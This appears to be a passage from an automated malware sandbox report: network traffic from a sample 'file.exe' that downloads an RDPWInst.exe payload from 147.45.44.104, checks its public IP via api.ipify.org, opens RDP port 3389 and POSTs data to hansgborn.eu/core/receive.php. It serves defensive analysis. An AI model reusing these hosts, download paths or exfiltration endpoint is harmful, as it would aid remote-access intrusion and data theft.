                                                                                                                                Oct 3, 2024 15:07:08.522074938 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522083044 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.522090912 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522111893 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522118092 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.522129059 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522142887 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522156000 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.522159100 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522176027 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522186041 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.522217035 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.522563934 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522587061 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522603035 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522631884 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.522656918 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522671938 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522686005 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522699118 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522711992 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.522742987 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.522747993 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522763014 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522777081 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522790909 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522792101 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.522820950 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.522866011 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522880077 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522893906 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522907972 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522912979 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.522922993 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522929907 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.522938013 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.522962093 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.562964916 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.599630117 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.599649906 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.599673033 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.599685907 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.599701881 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.599715948 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.599729061 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.599749088 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.599817991 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.600394964 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.600438118 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.600438118 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.600459099 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.600501060 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.600505114 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.600519896 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.600533962 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.600548029 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.600560904 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.600589037 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.600790024 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.600802898 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.600842953 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.600913048 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.600995064 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601008892 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601025105 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601035118 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.601041079 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601068974 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.601094007 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601109028 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601121902 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601135015 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601138115 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.601151943 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601161003 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.601166964 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601182938 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601191998 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.601231098 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.601236105 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601252079 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601274967 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601289034 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601289988 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.601303101 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601324081 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601327896 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.601347923 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601361990 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601362944 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.601377964 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601392031 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601399899 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.601408005 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601422071 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601432085 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.601442099 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601455927 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601460934 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.601473093 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601488113 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601494074 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.601505041 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601530075 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.601834059 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601859093 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601872921 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601875067 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.601908922 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601922035 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601936102 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601937056 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.601952076 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601960897 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.601967096 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601982117 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.601989031 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.602000952 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.602015018 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.602025032 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.602030039 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.602050066 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.602087021 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.602102041 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.602116108 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.602129936 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.602134943 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.602154970 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.602233887 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.602260113 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.602272034 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.602276087 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.602312088 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.602349043 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.602364063 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.602380037 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.602401972 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.656488895 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:46.148694038 CEST4971380192.168.2.5104.26.12.205
                                                                                                                                Oct 3, 2024 15:07:46.153615952 CEST8049713104.26.12.205192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:46.153820992 CEST4971380192.168.2.5104.26.12.205
                                                                                                                                Oct 3, 2024 15:07:46.153867006 CEST4971380192.168.2.5104.26.12.205
                                                                                                                                Oct 3, 2024 15:07:46.158796072 CEST8049713104.26.12.205192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:46.629789114 CEST8049713104.26.12.205192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:46.632461071 CEST497143389192.168.2.58.46.123.33
                                                                                                                                Oct 3, 2024 15:07:46.637640953 CEST3389497148.46.123.33192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:46.637742043 CEST497143389192.168.2.58.46.123.33
                                                                                                                                Oct 3, 2024 15:07:46.638144970 CEST497143389192.168.2.58.46.123.33
                                                                                                                                Oct 3, 2024 15:07:46.641474009 CEST4971380192.168.2.5104.26.12.205
                                                                                                                                Oct 3, 2024 15:07:46.643129110 CEST3389497148.46.123.33192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:46.643204927 CEST497143389192.168.2.58.46.123.33
                                                                                                                                Oct 3, 2024 15:07:46.646446943 CEST8049713104.26.12.205192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:46.756611109 CEST8049713104.26.12.205192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:46.813180923 CEST4971380192.168.2.5104.26.12.205
                                                                                                                                Oct 3, 2024 15:07:46.848289967 CEST49715443192.168.2.5188.114.97.3
                                                                                                                                Oct 3, 2024 15:07:46.848340988 CEST44349715188.114.97.3192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:46.848408937 CEST49715443192.168.2.5188.114.97.3
                                                                                                                                Oct 3, 2024 15:07:46.857234001 CEST49715443192.168.2.5188.114.97.3
                                                                                                                                Oct 3, 2024 15:07:46.857254028 CEST44349715188.114.97.3192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:47.339584112 CEST44349715188.114.97.3192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:47.339678049 CEST49715443192.168.2.5188.114.97.3
                                                                                                                                Oct 3, 2024 15:07:47.345309973 CEST49715443192.168.2.5188.114.97.3
                                                                                                                                Oct 3, 2024 15:07:47.345321894 CEST44349715188.114.97.3192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:47.345598936 CEST44349715188.114.97.3192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:47.390861034 CEST49715443192.168.2.5188.114.97.3
                                                                                                                                Oct 3, 2024 15:07:47.394984961 CEST49715443192.168.2.5188.114.97.3
                                                                                                                                Oct 3, 2024 15:07:47.435419083 CEST44349715188.114.97.3192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:47.493746042 CEST44349715188.114.97.3192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:47.494704008 CEST49715443192.168.2.5188.114.97.3
                                                                                                                                Oct 3, 2024 15:07:47.494724989 CEST44349715188.114.97.3192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:47.864528894 CEST44349715188.114.97.3192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:47.864619970 CEST44349715188.114.97.3192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:47.864680052 CEST49715443192.168.2.5188.114.97.3
                                                                                                                                Oct 3, 2024 15:07:47.873677969 CEST49715443192.168.2.5188.114.97.3
                                                                                                                                Oct 3, 2024 15:07:47.936197996 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:47.938064098 CEST4971380192.168.2.5104.26.12.205
                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Oct 3, 2024 15:07:46.138724089 CEST5340653192.168.2.51.1.1.1
                                                                                                                                Oct 3, 2024 15:07:46.145906925 CEST53534061.1.1.1192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:46.815820932 CEST5693453192.168.2.51.1.1.1
                                                                                                                                Oct 3, 2024 15:07:46.847645998 CEST53569341.1.1.1192.168.2.5
                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Oct 3, 2024 15:07:46.138724089 CEST192.168.2.51.1.1.10x1032Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                Oct 3, 2024 15:07:46.815820932 CEST192.168.2.51.1.1.10x5ab6Standard query (0)hansgborn.euA (IP address)IN (0x0001)false
                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Oct 3, 2024 15:07:46.145906925 CEST1.1.1.1192.168.2.50x1032No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                Oct 3, 2024 15:07:46.145906925 CEST1.1.1.1192.168.2.50x1032No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                Oct 3, 2024 15:07:46.145906925 CEST1.1.1.1192.168.2.50x1032No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                Oct 3, 2024 15:07:46.847645998 CEST1.1.1.1192.168.2.50x5ab6No error (0)hansgborn.eu188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                Oct 3, 2024 15:07:46.847645998 CEST1.1.1.1192.168.2.50x5ab6No error (0)hansgborn.eu188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                • hansgborn.eu
                                                                                                                                • 147.45.44.104
                                                                                                                                • api.ipify.org
                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.549704147.45.44.104806980C:\Users\user\Desktop\file.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 3, 2024 15:07:02.046128035 CEST94OUTGET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1
                                                                                                                                Host: 147.45.44.104
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Oct 3, 2024 15:07:05.876499891 CEST1236INHTTP/1.1 200 OK
                                                                                                                                Server: nginx
                                                                                                                                Date: Thu, 03 Oct 2024 13:07:05 GMT
                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                Content-Length: 1785344
                                                                                                                                Last-Modified: Thu, 26 Sep 2024 12:36:03 GMT
                                                                                                                                Connection: keep-alive
                                                                                                                                Keep-Alive: timeout=120
                                                                                                                                ETag: "66f55533-1b3e00"
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 [TRUNCATED]
                                                                                                                                Data Ascii: MZP@!L!This program must be run under Win32$7PEL#CZ4<7P@@`{^.text `.itext|0 `.dataxP8@.bssOpL.idataL@.tls`.rdata`@@.reloc^`b@B.rsrc{`|@@p@@
                                                                                                                                Oct 3, 2024 15:07:05.876523972 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Data Ascii: @Boolean@FalseTrueSystem4@AnsiChar@P@Char@h@ShortInt@@SmallInt
                                                                                                                                Oct 3, 2024 15:07:05.876535892 CEST1236INData Raw: 15 40 00 42 00 f4 ff b2 15 40 00 43 00 f4 ff f0 15 40 00 42 00 f4 ff 1f 16 40 00 42 00 f4 ff 48 16 40 00 43 00 f4 ff 7c 16 40 00 43 00 f4 ff b5 16 40 00 43 00 f4 ff e0 16 40 00 43 00 f4 ff 09 17 40 00 43 00 f4 ff 35 17 40 00 43 00 f4 ff 71 17 40
                                                                                                                                Data Ascii: @B@C@B@BH@C|@C@C@C@C5@Cq@C@C@C-@Bg@B@B@C%@CV@C@J@J@J@Ju@J@J@J@JO@Kz@J@MTOb
                                                                                                                                Oct 3, 2024 15:07:05.876625061 CEST1236INData Raw: 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 33 00 70 53 40 00 08 55 6e 69 74 4e 61 6d 65 03 00 10 12 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 40 10 12 40 00 01 00 01 01 02 00 02 00 33 00 48 52 40 00 06 45 71 75 61 6c 73 03
                                                                                                                                Data Ascii: Self3pS@UnitName@Self@@3HR@Equals@@Self@Obj+PR@GetHashCode@@Self38T@ToString@@Self@@[0T@SafeCallExceptionl@
                                                                                                                                Oct 3, 2024 15:07:05.876637936 CEST1236INData Raw: 09 54 44 61 74 65 54 69 6d 65 01 02 00 8b c0 2c 1e 40 00 0e 0e 54 56 61 72 41 72 72 61 79 42 6f 75 6e 64 08 00 00 00 00 00 00 00 00 02 00 00 00 9c 10 40 00 00 00 00 00 02 0c 45 6c 65 6d 65 6e 74 43 6f 75 6e 74 02 00 9c 10 40 00 04 00 00 00 02 08
                                                                                                                                Data Ascii: TDateTime,@TVarArrayBound@ElementCount@LowBound|@TVarArrayBoundArray(@@PVarArray@@@TVarArray@DimCount@Flags@Eleme
                                                                                                                                Oct 3, 2024 15:07:05.876650095 CEST1236INData Raw: 63 65 02 00 f8 10 40 00 0c 00 00 00 02 0c 44 61 74 61 49 6e 73 74 61 6e 63 65 02 00 f8 10 40 00 10 00 00 00 02 0b 52 65 73 49 6e 73 74 61 6e 63 65 02 00 e8 21 40 00 14 00 00 00 02 08 54 79 70 65 49 6e 66 6f 02 00 9c 10 40 00 18 00 00 00 02 08 52
                                                                                                                                Data Ascii: ce@DataInstance@ResInstance!@TypeInfo@ReservedP#@PResStringRech#@@l#@TResStringRecModule@Identifier@H%D%D%
                                                                                                                                Oct 3, 2024 15:07:05.876662016 CEST776INData Raw: df 7a 18 df 7a 10 df 7a 08 df 3a c3 8d 40 00 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 df 68 30 8b 48 38 89 4a 38 df 7a 30 df 7a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 90 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 df 68
                                                                                                                                Data Ascii: zzz:@(hhhh h(h0H8J8z0z(z zzz:(hhhh h(h0h8H@J@z8z0z(z zzz:@y,l|<x,<DD@,<xH9JtzD!DzDu
                                                                                                                                Oct 3, 2024 15:07:05.876811028 CEST1236INData Raw: 89 14 24 8b 50 04 89 54 24 04 8b 50 0c f6 c2 08 75 1a 68 00 80 00 00 6a 00 56 e8 b8 fa ff ff 85 c0 74 04 33 ff eb 3f 83 cf ff eb 3a 8b de 8b ea 83 e5 f0 33 ff 6a 1c 8d 44 24 0c 50 53 e8 19 fa ff ff 68 00 80 00 00 6a 00 53 e8 88 fa ff ff 85 c0 75
                                                                                                                                Data Ascii: $PT$PuhjVt3?:3jD$PShjSut$;v+uD$$$T$PD$]_^[SVWU;;v$jD$PD$P{|$upd$
                                                                                                                                Oct 3, 2024 15:07:05.876871109 CEST1236INData Raw: ff ff c6 05 34 7a 44 00 00 5b c3 56 57 8d 3c cd c4 7a 44 00 8b 77 04 8b 46 04 89 47 04 89 38 39 c7 75 17 b8 fe ff ff ff d3 c0 21 04 95 44 7a 44 00 75 07 0f b3 15 40 7a 44 00 bf f0 ff ff ff 23 7e fc 89 fa 29 da 74 1f 8d 04 33 8d 4a 03 89 48 fc 89
                                                                                                                                Data Ascii: 4zD[VW<zDwFG89u!DzDu@zD#~)t3JHT0rd7KN4zD_^[[+1PSMpDuajBt,J@At1[KZJQS1[tBJHA19Su
                                                                                                                                Oct 3, 2024 15:07:05.876878977 CEST1236INData Raw: 0f f4 ff ff 5a 59 89 c8 c1 e8 02 01 c8 31 ff 29 d0 83 d7 ff 21 f8 8d 84 02 d3 00 00 00 25 00 ff ff ff 83 c0 30 8d 55 04 29 c2 77 0b 83 24 2e f7 83 c5 04 eb 1e 90 90 89 54 2e fc 8d 7a 03 89 7c 30 fc 89 c5 81 fa 30 0b 00 00 72 07 01 f0 e8 00 f4 ff
                                                                                                                                Data Ascii: ZY1)!%0U)w$.T.z|00rn4zD]_^[4zD1)!RZt,vP]_^[^[%1SX`,sx
                                                                                                                                Oct 3, 2024 15:07:05.881541967 CEST372INData Raw: dc 9a 44 00 00 5b c3 53 56 57 8b f0 bf d8 9a 44 00 33 db 83 3f 00 74 3f e8 36 ff ff ff 84 c0 74 36 8b 07 8b 10 4a 85 d2 7c 26 42 33 c0 8b 0f 3b 74 81 04 75 17 8b 17 8b 12 8b 0f 8b 14 91 8b 0f 89 54 81 04 8b 17 ff 0a b3 01 eb 04 40 4a 75 dd c6 05
                                                                                                                                Data Ascii: D[SVWD3?t?6t6J|&B3;tuT@JuD_^[USVWEExPDUHMUEsEXEWHEG3E_ExE@EE


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.549713104.26.12.205806980C:\Users\user\Desktop\file.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 3, 2024 15:07:46.153867006 CEST63OUTGET / HTTP/1.1
                                                                                                                                Host: api.ipify.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Oct 3, 2024 15:07:46.629789114 CEST227INHTTP/1.1 200 OK
                                                                                                                                Date: Thu, 03 Oct 2024 13:07:46 GMT
                                                                                                                                Content-Type: text/plain
                                                                                                                                Content-Length: 11
                                                                                                                                Connection: keep-alive
                                                                                                                                Vary: Origin
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ccd2838199e178c-EWR
                                                                                                                                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                Data Ascii: 8.46.123.33
                                                                                                                                Oct 3, 2024 15:07:46.641474009 CEST39OUTGET / HTTP/1.1
                                                                                                                                Host: api.ipify.org
                                                                                                                                Oct 3, 2024 15:07:46.756611109 CEST227INHTTP/1.1 200 OK
                                                                                                                                Date: Thu, 03 Oct 2024 13:07:46 GMT
                                                                                                                                Content-Type: text/plain
                                                                                                                                Content-Length: 11
                                                                                                                                Connection: keep-alive
                                                                                                                                Vary: Origin
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ccd2838da2e178c-EWR
                                                                                                                                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                Data Ascii: 8.46.123.33


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.549715188.114.97.34436980C:\Users\user\Desktop\file.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-10-03 13:07:47 UTC171OUTPOST /core/receive.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Host: hansgborn.eu
